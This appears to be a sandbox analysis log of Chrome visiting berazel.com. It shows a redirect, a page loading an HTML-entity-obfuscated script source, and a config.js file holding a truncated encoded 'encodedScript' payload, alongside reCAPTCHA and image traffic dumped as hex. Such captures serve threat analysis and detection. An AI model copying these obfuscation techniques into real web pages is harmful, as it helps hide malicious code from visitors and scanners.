                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:07:52 UTC247INHTTP/1.1 302 Found
                                                                                                                          Date: Thu, 19 Dec 2024 16:07:52 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 124
                                                                                                                          Connection: close
                                                                                                                          X-Robots-Tag: noindex
                                                                                                                          Location: https://berazel.com/wellness/south/index
                                                                                                                          Vary: Accept
                                                                                                                          Server: msys-http
                                                                                                                          2024-12-19 16:07:52 UTC124INData Raw: 3c 70 3e 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 72 61 7a 65 6c 2e 63 6f 6d 2f 77 65 6c 6c 6e 65 73 73 2f 73 6f 75 74 68 2f 69 6e 64 65 78 22 3e 68 74 74 70 73 3a 2f 2f 62 65 72 61 7a 65 6c 2e 63 6f 6d 2f 77 65 6c 6c 6e 65 73 73 2f 73 6f 75 74 68 2f 69 6e 64 65 78 3c 2f 61 3e 3c 2f 70 3e
                                                                                                                          Data Ascii: <p>Found. Redirecting to <a href="https://berazel.com/wellness/south/index">https://berazel.com/wellness/south/index</a></p>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.1649715151.106.103.1554437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:07:56 UTC674OUTGET /wellness/south/index HTTP/1.1
                                                                                                                          Host: berazel.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:07:56 UTC546INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          content-type: text/html
                                                                                                                          last-modified: Wed, 11 Dec 2024 15:16:24 GMT
                                                                                                                          accept-ranges: bytes
                                                                                                                          content-length: 531
                                                                                                                          date: Thu, 19 Dec 2024 16:07:56 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                          2024-12-19 16:07:56 UTC531INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 4a 50 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 31 31 35 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 31 31 39 3b 26 23 34 36 3b 26 23 31 30 33 3b 26 23 31 31 31 3b 26 23 31 31 31 3b 26 23 31 30 33 3b 26 23 31 30 38 3b 26 23 31 30 31 3b 26 23 34 36 3b 26 23 39 39 3b 26 23 31 31 31 3b
                                                                                                                          Data Ascii: <html lang="JP"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><script src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#103;&#111;&#111;&#103;&#108;&#101;&#46;&#99;&#111;


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.1649717151.106.103.1554437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:07:58 UTC551OUTGET /wellness/south/config.js HTTP/1.1
                                                                                                                          Host: berazel.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://berazel.com/wellness/south/index
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:07:58 UTC639INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          cache-control: public, max-age=604800
                                                                                                                          expires: Thu, 26 Dec 2024 16:07:58 GMT
                                                                                                                          content-type: application/javascript
                                                                                                                          last-modified: Wed, 11 Dec 2024 15:15:54 GMT
                                                                                                                          accept-ranges: bytes
                                                                                                                          content-length: 5459
                                                                                                                          date: Thu, 19 Dec 2024 16:07:58 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                          2024-12-19 16:07:58 UTC5459INData Raw: 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 63 53 30 2f 57 41 49 6a 47 69 56 65 47 6c 4e 77 50 55 46 34 57 6e 6c 72 50 46 63 54 64 78 59 6e 55 56 73 57 46 43 4d 6f 4e 78 34 38 4c 32 6f 4c 51 58 42 55 63 54 6f 53 57 6e 42 6d 50 79 6f 44 65 54 42 41 46 6b 46 33 55 32 6f 51 52 42 73 69 5a 69 34 31 47 7a 41 6e 44 31 67 43 4f 42 63 76 56 42 4a 48 63 44 45 69 4e 68 34 32 50 47 52 61 44 6a 51 53 50 6c 6c 64 46 48 34 75 4b 69 73 53 64 7a 67 2f 56 42 49 6a 41 53 4e 65 56 56 4a 68 62 33 42 53 57 6e 6c 72 61 68 5a 42 50 68 56 71 47 46 63 58 4d 53 38 6e 48 52 51 36 4a 43 35 54 42 58 35 54 4d 54 6f 53 57 6e 42 6d 61 33 68 61 65 53 34 6e 56 77 67 37 4e 79 39 54 58 52 34 31 49 6d 74 6c 57 6a 67 2f 4a 56 52 4a 4d 68 34 72 57 56 34 2f 50 69 55 6b 50 42
                                                                                                                          Data Ascii: var encodedScript = "cS0/WAIjGiVeGlNwPUF4WnlrPFcTdxYnUVsWFCMoNx48L2oLQXBUcToSWnBmPyoDeTBAFkF3U2oQRBsiZi41GzAnD1gCOBcvVBJHcDEiNh42PGRaDjQSPlldFH4uKisSdzg/VBIjASNeVVJhb3BSWnlrahZBPhVqGFcXMS8nHRQ6JC5TBX5TMToSWnBma3haeS4nVwg7Ny9TXR41ImtlWjg/JVRJMh4rWV4/PiUkPB


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.1649718172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:07:58 UTC618OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://berazel.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:07:59 UTC749INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Expires: Thu, 19 Dec 2024 16:07:59 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:07:59 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:07:59 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                          Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                          2024-12-19 16:07:59 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                                                                                                          Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                                                                                                          2024-12-19 16:07:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.1649720151.106.103.1554437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:00 UTC359OUTGET /wellness/south/config.js HTTP/1.1
                                                                                                                          Host: berazel.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:00 UTC639INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          cache-control: public, max-age=604800
                                                                                                                          expires: Thu, 26 Dec 2024 16:08:00 GMT
                                                                                                                          content-type: application/javascript
                                                                                                                          last-modified: Wed, 11 Dec 2024 15:15:54 GMT
                                                                                                                          accept-ranges: bytes
                                                                                                                          content-length: 5459
                                                                                                                          date: Thu, 19 Dec 2024 16:08:00 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          platform: hostinger
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                          2024-12-19 16:08:00 UTC729INData Raw: 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 63 53 30 2f 57 41 49 6a 47 69 56 65 47 6c 4e 77 50 55 46 34 57 6e 6c 72 50 46 63 54 64 78 59 6e 55 56 73 57 46 43 4d 6f 4e 78 34 38 4c 32 6f 4c 51 58 42 55 63 54 6f 53 57 6e 42 6d 50 79 6f 44 65 54 42 41 46 6b 46 33 55 32 6f 51 52 42 73 69 5a 69 34 31 47 7a 41 6e 44 31 67 43 4f 42 63 76 56 42 4a 48 63 44 45 69 4e 68 34 32 50 47 52 61 44 6a 51 53 50 6c 6c 64 46 48 34 75 4b 69 73 53 64 7a 67 2f 56 42 49 6a 41 53 4e 65 56 56 4a 68 62 33 42 53 57 6e 6c 72 61 68 5a 42 50 68 56 71 47 46 63 58 4d 53 38 6e 48 52 51 36 4a 43 35 54 42 58 35 54 4d 54 6f 53 57 6e 42 6d 61 33 68 61 65 53 34 6e 56 77 67 37 4e 79 39 54 58 52 34 31 49 6d 74 6c 57 6a 67 2f 4a 56 52 4a 4d 68 34 72 57 56 34 2f 50 69 55 6b 50 42
                                                                                                                          Data Ascii: var encodedScript = "cS0/WAIjGiVeGlNwPUF4WnlrPFcTdxYnUVsWFCMoNx48L2oLQXBUcToSWnBmPyoDeTBAFkF3U2oQRBsiZi41GzAnD1gCOBcvVBJHcDEiNh42PGRaDjQSPlldFH4uKisSdzg/VBIjASNeVVJhb3BSWnlrahZBPhVqGFcXMS8nHRQ6JC5TBX5TMToSWnBma3haeS4nVwg7Ny9TXR41ImtlWjg/JVRJMh4rWV4/PiUkPB
                                                                                                                          2024-12-19 16:08:00 UTC4730INData Raw: 57 30 35 31 55 32 45 51 56 68 55 39 4a 79 49 32 57 6d 4e 72 62 52 46 61 58 56 4e 71 4f 68 4a 61 63 47 59 39 4f 51 68 35 4a 69 74 66 44 78 51 63 4a 45 52 54 45 7a 34 6a 4f 58 68 48 65 53 38 6c 56 52 51 36 46 69 52 45 48 42 30 31 4d 67 34 30 48 7a 51 75 4a 45 49 6a 4c 6a 6f 75 47 42 55 58 4d 53 38 6c 47 78 55 33 50 79 74 66 44 7a 49 42 62 52 6b 4a 63 48 42 6d 61 33 67 58 4f 43 49 6b 64 51 34 35 42 79 74 5a 58 42 38 69 61 44 67 73 41 7a 55 75 5a 46 49 49 4a 41 4d 6d 55 55 74 61 62 57 5a 73 50 68 59 38 4d 32 30 4e 61 33 64 54 61 68 42 66 47 7a 6b 6f 43 44 63 55 4c 53 6f 6a 57 41 51 6c 58 54 6c 45 53 78 59 31 61 43 30 30 48 79 45 50 49 30 51 45 4e 41 63 6a 58 31 78 61 62 57 5a 73 4f 78 55 31 50 69 64 59 52 6d 78 35 61 68 41 53 57 6a 30 6e 49 6a 59 35 4e 69 55
                                                                                                                          Data Ascii: W051U2EQVhU9JyI2WmNrbRFaXVNqOhJacGY9OQh5JitfDxQcJERTEz4jOXhHeS8lVRQ6FiREHB01Mg40HzQuJEIjLjouGBUXMS8lGxU3PytfDzIBbRkJcHBma3gXOCIkdQ45BytZXB8iaDgsAzUuZFIIJAMmUUtabWZsPhY8M20Na3dTahBfGzkoCDcULSojWAQlXTlESxY1aC00HyEPI0QENAcjX1xabWZsOxU1PidYRmx5ahASWj0nIjY5NiU


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.1649721199.232.168.1594437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:00 UTC611OUTGET /media/GY70XKXXEAA_bbZ?format=jpg&name=large HTTP/1.1
                                                                                                                          Host: pbs.twimg.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://berazel.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:00 UTC747INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 20353
                                                                                                                          perf: 7402827104
                                                                                                                          cache-tag: media,media/bucket/4,media/1841677976397615104
                                                                                                                          content-type: image/jpeg
                                                                                                                          cache-control: max-age=604800, must-revalidate
                                                                                                                          last-modified: Thu, 03 Oct 2024 03:11:40 GMT
                                                                                                                          x-transaction-id: ea58db84c8deec17
                                                                                                                          timing-allow-origin: https://twitter.com, https://mobile.twitter.com
                                                                                                                          strict-transport-security: max-age=631138519
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-expose-headers: Content-Length
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:00 GMT
                                                                                                                          X-Cache: HIT, HIT
                                                                                                                          x-tw-cdn: FT
                                                                                                                          x-served-by: cache-lhr-egll1980078-LHR, cache-par-lfpg1960040-PAR, cache-tw-ZZZ1
                                                                                                                          Server-Timing: x-cache;desc=HIT, x-tw-cdn;desc=FT
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 17 00 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 07 ff c4 00 17 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 03 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 eb 90 e7 b0 00 00 42 c0 00 42 c5 25 00 51
                                                                                                                          Data Ascii: JFIFC!"$"$C8"BB%Q
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 00 00 04 b0 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 05 82 a5 00 00 00 00 0a 00 00 80 16 0b 2a a2 82 50 00 20 9a 80 00 00 08 01 42 c0 00 00 09 60 0a 00 00 00 00 25 95 10 00 00 16 00 00 0b 28 00 00 50 80 01 05 00 00 14 48 00 00 05 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 08 00 42 51 16 00 0a 45 94 00 01 00 00 00 00 00 00 00 12 80 00 00 00 00 00 15 05 4a 00 00 00 00 00 50 01 00 50 25 54 b2 80 41 35 00 00 00 80 02 85 80 00 01 00 01 40 00 20 10 28 0a 48 00 00 02 c0 00 01 65 00 00 0b 04 a8 2c a2 0a 00 05 96 01 00 00 00 a0 00 4b 05 82 80 00 00 04 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 02 0a 88 0a 58 80 00 00 00 00 00 00 00 02 2c 28 00 04 00 16 50 00 00 00 00 00 16 0a 00 00 00 00 02 80 08 58 2a 51 2a 80
                                                                                                                          Data Ascii: *P B`%(PHBQEJPP%TA5@ (He,K@X,(PX*Q*
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 00 0a 04 51 04 80 00 0b 02 00 00 00 00 00 09 44 00 40 50 00 01 52 81 00 05 00 00 00 01 40 00 00 00 b2 91 44 05 4a 00 00 00 00 00 5e d2 c0 00 01 62 92 28 8a 51 00 00 00 00 00 08 00 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 14 8a a0 42 51 02 a5 11 60 00 a0 85 81 60 01 40 82 a0 a0 00 00 02 82 02 80 00 24 00 00 00 00 00 00 00 00 00 02 52 20 40 00 00 08 b0 28 8b 00 00 00 08 00 80 02 80 01 65 02 00 0a 00 00 00 02 80 00 00 01 60 a0 4a 00 00 00 00 00 00 bd a0 00 00 00 00 02 58 a0 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 01 49 2c 55 41 60 00 00 14 40 00 05 00 00 00 0a 4a 01 01 40 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 40 10 20 00 00 00 10 00 00 00 44 59 41 00 05 00 02 ca 04 00 00 50 00 00 02 ca 00 00 00 01 52 80 00 00 00 00 00 01
                                                                                                                          Data Ascii: QD@PR@DJ^b(QBQ``@$R @(e`JXI,UA`@J@@ DYAPR
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 00 50 00 04 00 00 50 01 00 05 00 02 c4 00 05 94 00 2a 28 08 00 08 3b a0 01 00 00 00 00 02 00 00 02 41 68 00 00 00 20 00 00 00 00 00 00 00 00 00 05 00 00 00 00 2c 14 00 00 00 00 52 0b 05 00 01 00 00 00 00 00 00 00 00 10 00 00 00 00 00 04 00 00 00 00 00 00 04 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 45 24 b2 80 00 05 94 b0 20 10 77 41 00 81 42 80 09 00 02 0a 00 04 a2 15 62 92 50 8b 00 00 00 00 00 00 00 00 00 00 00 02 a5 00 00 00 05 25 00 00 00 00 00 00 0a 00 00 00 20 00 00 00 00 00 00 20 00 00 00 00 00 08 00 00 00 00 01 48 a2 2c 05 84 aa 8a 88 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 59 40 00 02 50 04 00 0a 15 2c 00 83 40 20 10 00 a0 02 00 94 40 00 00 00 00 02 58 00 00 00 00 21 50 54 15 05 00 00 00
                                                                                                                          Data Ascii: PP*(;Ah ,RE$ wABbP% H,PY@P,@ @X!PT
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 28 00 00 02 80 00 40 00 00 00 12 84 50 00 00 00 00 05 44 14 00 00 00 00 0b 28 02 51 00 01 60 00 0b 29 16 01 40 28 00 00 00 01 81 a7 00 05 00 00 28 00 80 25 80 00 45 80 00 00 00 52 00 01 00 00 00 00 00 00 00 0a 4a 00 00 00 0b 28 00 0b 28 80 10 00 00 00 05 00 00 00 00 00 04 02 80 00 14 28 40 20 01 00 00 0a 00 00 00 02 cb 09 40 85 00 28 00 04 00 00 00 00 29 28 01 00 29 15 00 00 00 00 00 00 11 44 59 40 2c a0 00 01 28 01 16 00 50 25 10 50 14 00 00 00 00 60 69 c0 00 05 00 00 00 00 02 58 00 02 51 00 00 01 50 00 00 00 00 04 00 51 14 25 12 80 00 00 00 00 2c a0 00 2c a0 80 01 00 00 b2 92 80 00 00 00 00 00 10 0a 00 0b 28 0b 16 45 4a 80 04 00 0a 00 00 00 00 01 00 01 42 80 00 01 00 00 00 0b 28 00 09 44 54 00 00 00 00 00 00 00 00 00 25 00 00 14 00 00 01 14 00 04 02 ca
                                                                                                                          Data Ascii: (@PD(Q`)@((%ERJ(((@ @()()DY@,(P%P`iXQPQ%,,(EJB(DT%
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 00 50 01 00 80 00 00 5a 10 14 00 00 00 00 40 20 28 00 58 15 28 00 40 00 00 00 00 00 00 00 00 00 42 c2 d4 a0 00 00 10 00 00 02 84 00 00 25 12 80 00 00 02 80 00 00 00 02 cb 00 00 02 51 14 40 00 0a 00 01 00 54 aa 04 a0 00 00 00 00 02 0a 20 00 00 00 01 40 02 02 82 00 00 00 05 00 00 10 6b c0 00 01 16 00 00 00 11 60 00 11 44 b1 54 42 51 16 00 05 00 00 40 20 00 00 00 28 00 00 01 49 16 28 00 28 4a 01 00 00 00 00 00 00 02 91 44 58 16 05 11 51 14 a9 40 00 15 11 44 58 0a 42 c4 51 14 40 a0 54 45 00 00 00 0a 00 16 51 00 00 01 14 00 00 00 00 45 11 52 c0 05 00 10 02 c2 d4 a0 00 00 00 00 02 00 00 00 00 14 00 20 28 00 80 00 00 01 40 00 04 1a 70 14 00 00 25 11 60 00 00 01 14 40 00 00 85 45 54 b0 94 45 11 60 14 00 00 2c 02 91 51 00 00 0b 05 21 42 00 00 28 40 00 00 00 00 00
                                                                                                                          Data Ascii: PZ@ (X(@B%Q@T @k`DTBQ@ (I((JDXQ@DXBQ@TEQER (@p%`@ETE`,Q!B(@
